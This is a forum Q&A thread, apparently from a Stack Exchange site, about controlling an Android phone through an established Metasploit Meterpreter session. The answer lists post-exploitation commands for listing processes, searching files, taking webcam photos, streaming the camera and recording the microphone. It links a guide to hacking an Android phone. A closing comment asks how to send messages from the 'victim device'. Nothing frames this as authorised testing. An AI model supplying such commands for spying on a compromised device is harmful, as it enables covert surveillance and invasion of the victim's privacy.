# meterpreter commands after session created

Tags: meterpreter

After creating a session with an Android device by meterpreter, I need commands to control the target android device, like taking pictures with the camera.

How can I search for these types of commands on internet?

Comment: Have you read any of the Metasploit documentation? Everything you ask for is there and is where you should always start when you are new to a technology.

Answer (score 0):

View running processes: `meterpreter > ps`

Printing the Working directory: `meterpreter > pwd`

Search for a file: `meterpreter > search –f *.mp3`

Take photos using the devices cameras: `meterpreter > webcam_list` or 
                                       `meterpreter > webcam_snap`

If you want to take a photo using the second camera: `meterpreter > webcam_snap –I 2`

Record sound with the microphone:  `meterpreter > record_mic 5`

Viewing a video stream from the devices camera: `meterpreter > webcam_stream –I 2`

[Using Metasploit to Hack an android phone](http://www.security-sleuth.com/sleuth-blog/2015/1/11/using-metasploit-to-hack-an-android-phone)

Comment: thankx for your response brothers.. can i send message from victim device to anyone ???